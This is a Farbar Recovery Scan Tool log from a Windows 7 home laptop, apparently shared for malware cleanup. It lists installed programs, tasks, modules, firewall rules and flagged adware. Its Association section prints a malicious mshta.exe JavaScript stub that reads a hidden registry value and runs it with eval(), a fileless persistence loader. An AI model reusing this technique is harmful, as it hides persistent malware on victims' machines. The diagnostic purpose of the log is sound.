2017-01-22 10:40 - 2012-06-20 17:59 - 00003966 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{7EDBB666-6155-498C-A9DE-64EE2BB2D2AC}
2017-01-22 07:56 - 2009-07-13 20:45 - 00032064 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-01-22 07:56 - 2009-07-13 20:45 - 00032064 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-01-22 07:53 - 2015-10-24 13:37 - 00000000 ____D C:\Users\Karen Laptop\Documents\Avery Templates
2017-01-22 07:53 - 2012-06-23 17:39 - 00000000 ____D C:\Users\Karen Laptop\Documents\Karen docs
2017-01-22 07:48 - 2012-06-20 17:54 - 00000000 ____D C:\Users\Karen Laptop\AppData\LocalLow\AuthenTec
2017-01-22 07:48 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-01-21 16:28 - 2016-08-22 16:47 - 00000892 _____ C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job
2017-01-01 12:51 - 2016-08-24 18:01 - 00000000 ____D C:\Program Files\McAfee Security Scan

==================== Files in the root of some directories =======

2016-08-16 05:09 - 2016-08-16 05:09 - 2225683 _____ () C:\Users\Karen Laptop\AppData\Roaming\sb279.dat
2016-08-16 05:09 - 2016-08-16 05:09 - 0229888 _____ () C:\Users\Karen Laptop\AppData\Roaming\Setup22240.exe
2014-04-20 09:45 - 2016-09-26 18:13 - 0000279 _____ () C:\Users\Karen Laptop\AppData\Roaming\WB.CFG
2016-07-31 07:19 - 2016-07-31 07:19 - 0000017 _____ () C:\Users\Karen Laptop\AppData\Local\resmon.resmoncfg

Some files in TEMP:
====================
2014-04-15 15:23 - 2014-04-15 15:23 - 0026424 _____ (AVG) C:\Users\Karen Laptop\AppData\Local\Temp\DseShExt-x64.dll
2014-04-15 15:23 - 2014-04-15 15:23 - 0028472 _____ (AVG) C:\Users\Karen Laptop\AppData\Local\Temp\DseShExt-x86.dll
2017-01-22 08:18 - 2017-01-22 08:18 - 0000272 _____ () C:\Users\Karen Laptop\AppData\Local\Temp\install_flash_player_24_active_x.exe
2014-04-15 15:23 - 2014-04-15 15:23 - 0032056 _____ (AVG) C:\Users\Karen Laptop\AppData\Local\Temp\SDShelEx-win32.dll
2014-04-15 15:23 - 2014-04-15 15:23 - 0031544 _____ (AVG) C:\Users\Karen Laptop\AppData\Local\Temp\SDShelEx-x64.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-06-18 18:24

==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-01-2017
Ran by Karen Laptop (22-01-2017 13:08:51)
Running from C:\Users\Karen Laptop\Downloads
Windows 7 Home Premium Service Pack 1 (X64) (2012-06-21 01:54:34)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3553682965-2478827086-665785291-500 - Administrator - Disabled)
Guest (S-1-5-21-3553682965-2478827086-665785291-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3553682965-2478827086-665785291-1004 - Limited - Enabled)
Karen Laptop (S-1-5-21-3553682965-2478827086-665785291-1000 - Administrator - Enabled) => C:\Users\Karen Laptop

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Microsoft Security Essentials (Enabled - Up to date) {2C040BB5-2B06-7275-5A21-2B969A740B4B}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.7.700.224 - Adobe Systems Incorporated)
Adobe Flash Player 22 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 22.0.0.209 - Adobe Systems Incorporated)
Adobe Reader X (10.1.16) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.16 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.1.629 - Adobe Systems, Inc.)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B678797F-DF38-4556-8A31-8B818E261868}) (Version: 8.0.0.23 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AuthenTec TrueAPI (Version: 1.3.0.139 - AuthenTec, Inc.) Hidden
Avery Search App by Ask (HKLM-x32\...\{41565232-2D53-5000-76A7-A758B70C2D01}) (Version: 12.45.1.1180 - APN, LLC)
Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Citrix XenApp Web Plugin (HKLM-x32\...\{EBFEEB3F-3E3B-4725-A4E0-376144CE4F76}) (Version: 11.0.0.5357 - Citrix Systems, Inc.)
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.0.4528 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{E96CAA2A-0244-4A2A-8403-0C3C9534778B}) (Version: 2.1.1 - Hewlett-Packard)
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
Farmscapes (x32 Version: 2.2.0.98 - WildTangent) Hidden
FATE (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
GameSpy Arcade (HKLM-x32\...\GameSpy Arcade) (Version: - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.1.2.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hoyle Card Games 4 (HKLM-x32\...\Hoyle Card Games 4) (Version: - )
HP Application Assistant (HKLM\...\{6032497A-4479-462B-ADB8-A0A372BB9A23}) (Version: 1.0.409.3882 - Hewlett-Packard)
HP Connection Manager (HKLM-x32\...\{B65FCAA5-F3A6-4B3F-ABEE-CBC2B085796B}) (Version: 4.1.25.1 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{BC6CB499-9F29-4B41-8B8B-FA7248525256}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP Launch Box (HKLM\...\{BF1E75D0-E7AF-4BEA-9FBC-567F0C54BDF9}) (Version: 1.0.12 - Hewlett-Packard Company)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Power Manager (HKLM-x32\...\{E44578C7-4667-4124-8BC2-1161BCA54978}) (Version: 1.4.4 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{285F722C-0E45-47DE-B38E-5B3B10FA4A7C}) (Version: 2.5.2 - Hewlett-Packard Company)
HP QuickWeb (HKLM-x32\...\{BB4FC2AD-DF12-4EE1-8AA7-2C0A26B5E2FB}) (Version: 3.1.1.10197 - Hewlett-Packard Company)
HP Security Assistant (HKLM\...\{562608FE-2051-4488-BF22-8CE4C03046AC}) (Version: 1.0.12 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}) (Version: 9.0.15076.3891 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.2.14901.3869 - Hewlett-Packard Company)
HP SimplePass PE 2011 (HKLM-x32\...\{4741965C-AFD0-4D00-81D1-1039F96D4DC3}) (Version: 5.3.0.264 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{AF240B18-034B-4A82-B3FC-0B879C4BAE2E}) (Version: 4.5.1.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{6F44AF95-3CDE-4513-AD3F-6D45F17BF324}) (Version: 6.1.12.1 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6365.0 - IDT)
Image Converter (HKLM-x32\...\Image Converter Image Converter) (Version: 1.0.0 - Image Converter)
Image Editor Packages (HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\Image Editor Packages) (Version: - ) <==== ATTENTION
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel(R) Identity Protection Technology 1.1.2.0 (HKLM-x32\...\{C01A86F5-56E7-101F-9BC9-E3F1025EB779}) (Version: 1.1.2.0 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2476 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.5.0.1026 - Intel Corporation)
iPad/iPhone/iPod to Computer Transfer 7.7.4 (HKLM\...\Cucusoft iPad/iPhone/iPod to Computer Transfer_is1) (Version: - Cucusoft, Inc.)
iTunes (HKLM\...\{F46AA0F1-E284-4878-A462-5F11B9166C0E}) (Version: 11.4.0.18 - Apple Inc.)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Jewel Quest Mysteries: The Seventh Gate Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Letters from Nowhere 2 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Luxor HD (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mah Jong Medley (x32 Version: 2.2.0.95 - WildTangent) Hidden
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.474.2 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM-x32\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.0.1526.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20913.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Norton Security Scan (HKLM-x32\...\NSS) (Version: 4.3.1.3 - Symantec Corporation)
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
Palm Desktop (HKLM-x32\...\{4D8314D2-11FE-4397-A7CC-7015CFF50BCE}) (Version: 4.1.0300 - Palm, Inc.)
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
QuickTime (HKLM-x32\...\{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}) (Version: 7.73.80.64 - Apple Inc.)
Quiknowledge (HKLM-x32\...\Quiknowledge) (Version: 1.9.0.3 - Quiknowledge) <==== ATTENTION
Ralink RT5390 802.11b/g/n WiFi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309B0}) (Version: 3.02.02.0 - Ralink)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.48.823.2011 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.7601.85 - Realtek Semiconductor Corp.)
RollerCoaster Tycoon 3: Platinum (x32 Version: 2.2.0.98 - WildTangent) Hidden
Scrabble Complete (HKLM-x32\...\{B36649A3-D0DD-4706-B042-F5B384529C7A}) (Version: - )
Skype™ 5.5 (HKLM-x32\...\{AA59DDE4-B672-4621-A016-4C248204957A}) (Version: 5.5.117 - Skype Technologies S.A.)
Speedial (HKLM-x32\...\Speedial) (Version: - Speedial) <==== ATTENTION
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics TouchPad Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.11.0 - Synaptics Incorporated)
The Treasures of Mystery Island: The Ghost Ship (x32 Version: 2.2.0.98 - WildTangent) Hidden
Torchlight (x32 Version: 2.2.0.98 - WildTangent) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
VideoFileDownload (HKLM-x32\...\vfd-adk) (Version: 1.0 - VideoFileDownload)
VIP Access SDK (1.0.1.2) (HKLM-x32\...\VIP Access SDK) (Version: 1.0.1.2 - Symantec Inc.)
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WebEx (HKLM-x32\...\ActiveTouchMeetingClient) (Version: - Cisco WebEx LLC)
WildTangent Games App (HP Games) (x32 Version: 4.0.10.16 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0666F0CF-98EA-4D09-A5A1-D550880A440A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-08-22] (Adobe Systems Incorporated)
Task: {1872D861-2690-4DCD-8ED0-78D12C72F814} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-28] (Google Inc.)
Task: {1E1BCA3B-250E-4267-87A4-9B59B52DCACB} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {7B53E4DC-D729-4556-8F48-3F0F691AB37C} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2011-09-28] (CyberLink)
Task: {811B9503-EF3E-4D44-BA82-8D702311B1BD} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-28] (Google Inc.)
Task: {8242DE3E-AF9F-4EE9-995E-A6B949FEADF3} - System32\Tasks\Norton Security Scan for Karen Laptop => C:\Program Files (x86)\Norton Security Scan\Engine\4.3.1.3\Nss.exe [2015-10-15] (Symantec Corporation)
Task: {8B8F93BF-D29B-4EED-90A3-7DA3C0E7EBB7} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_22_0_0_209_pepper.exe [2016-08-22] (Adobe Systems Incorporated)
Task: {A037F9F4-A25E-40C6-90B5-F721DEAEEDE5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2011-09-09] (Hewlett-Packard Company)
Task: {A2DD7DDE-83A0-4EEB-B0D9-5F178B89AF8F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater\HPSFUpdater.exe [2011-06-14] (Hewlett-Packard)
Task: {B0A46419-7777-4ED4-8EAA-FDA404049F39} - System32\Tasks\Adobe online update program => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {BFC5AEF7-FA4A-497F-A01D-AA552916C39F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFMessenger\HPSFMsgr.exe [2011-09-09] (Hewlett-Packard Company)
Task: {EF8AC5C0-D081-4734-887F-16316D91488F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2011-09-09] (Hewlett-Packard Company)
Task: {FEC6C83E-0EDC-49CC-8612-A15C49FE6920} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Total Care Tune-Up => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPTuneUp.exe [2011-03-22] (Hewlett-Packard Company)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_22_0_0_209_pepper.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Norton Security Scan for Karen Laptop.job => C:\PROGRA~2\NORTON~2\Engine\431~1.3\Nss.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2011-08-26 11:53 - 2011-08-26 11:53 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2011-04-27 16:05 - 2011-04-27 16:05 - 01102336 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\System.Data.SQLite.dll
2014-07-31 11:16 - 2014-07-31 11:16 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 11:16 - 2014-07-31 11:16 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2011-04-27 16:05 - 2011-04-27 16:05 - 00514570 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\sqlite3.dll
2013-02-03 13:22 - 2013-02-03 13:22 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\fd7fa1aa086fc23a60b1536d346f5657\IsdiInterop.ni.dll
2011-12-12 00:31 - 2011-04-30 00:28 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2016-12-15 07:14 - 2016-12-07 23:29 - 01829208 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libglesv2.dll
2016-12-15 07:14 - 2016-12-07 23:29 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libegl.dll
2009-02-26 12:46 - 2009-02-26 12:46 - 00064344 _____ () C:\Program Files (x86)\Microsoft Office\Office12\ADDINS\ColleagueImport.dll
2011-06-22 10:46 - 2011-06-22 10:46 - 00434016 _____ () C:\Program Files (x86)\Microsoft Office\Office12\ADDINS\UmOutlookAddin.dll
2011-10-05 03:52 - 2011-10-05 03:52 - 00756048 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\MSPTLS.DLL
2016-05-11 16:37 - 2015-07-29 23:50 - 01884672 _____ () C:\Users\Karen Laptop\AppData\Local\Chromium\Application\46.0.2470.0\libglesv2.dll
2016-05-11 16:37 - 2015-07-29 23:50 - 00075264 _____ () C:\Users\Karen Laptop\AppData\Local\Chromium\Application\46.0.2470.0\libegl.dll
2016-08-22 16:47 - 2016-08-22 16:47 - 17602240 _____ () C:\Windows\SysWOW64\Macromed\Flash\pepflashplayer32_22_0_0_209.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3553682965-2478827086-665785291-1000\Software\Classes\151f3: "C:\Windows\system32\mshta.exe" "javascript:L4vFGmby="e7O82";Pk0=new ActiveXObject("WScript.Shell");JufFXC5="YUb";C3lgb5=Pk0.RegRead("HKCU\\software\\qtdr\\feuqvieofe");uveV2="J";eval(C3lgb5);q1iVB="6IUEzjp";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 18:34 - 2017-01-01 12:51 - 00000859 ____A C:\Windows\system32\Drivers\etc\hosts


0.0.0.1 mssplus.mcafee.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3553682965-2478827086-665785291-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Karen Laptop\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{538C8A6F-2738-4392-938B-1479906898B9}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{90155409-060E-4781-8DE7-00FC8A070157}] => C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{BBB3BF29-3E41-4C29-84E4-5146F00461DC}] => LPort=2869
FirewallRules: [{654F5E4C-448E-454E-8156-CABCB2543FF7}] => LPort=1900
FirewallRules: [{8988E108-CB44-46EE-BDE4-5B1DA6B37B45}] => C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{23B2DFB3-E1D2-46A4-B912-0174CDAEBB9F}] => C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{017A1DCA-F5BD-41BE-AB3C-F7B806C1492C}] => C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [TCP Query User{64269338-C5BF-4C51-B042-88BFEE0F5D18}C:\program files (x86)\infogrames interactive\scrabble complete\scrabblecomplete.exe] => C:\program files (x86)\infogrames interactive\scrabble complete\scrabblecomplete.exe
FirewallRules: [UDP Query User{1113966D-A15E-4736-B752-90D4CF7AF732}C:\program files (x86)\infogrames interactive\scrabble complete\scrabblecomplete.exe] => C:\program files (x86)\infogrames interactive\scrabble complete\scrabblecomplete.exe
FirewallRules: [TCP Query User{583B9DAE-25A9-4990-9BB5-9619875A864F}C:\windows\syswow64\dplaysvr.exe] => C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{D77F3AF3-1F3D-4502-A7DE-05C17614CF9D}C:\windows\syswow64\dplaysvr.exe] => C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{D264833A-1D98-4DB7-B2F0-B73211B025A1}C:\program files (x86)\microsoft office\office12\groove.exe] => C:\program files (x86)\microsoft office\office12\groove.exe
FirewallRules: [UDP Query User{6CBE2596-21A0-4DBD-B1BB-D6B4AF15A091}C:\program files (x86)\microsoft office\office12\groove.exe] => C:\program files (x86)\microsoft office\office12\groove.exe
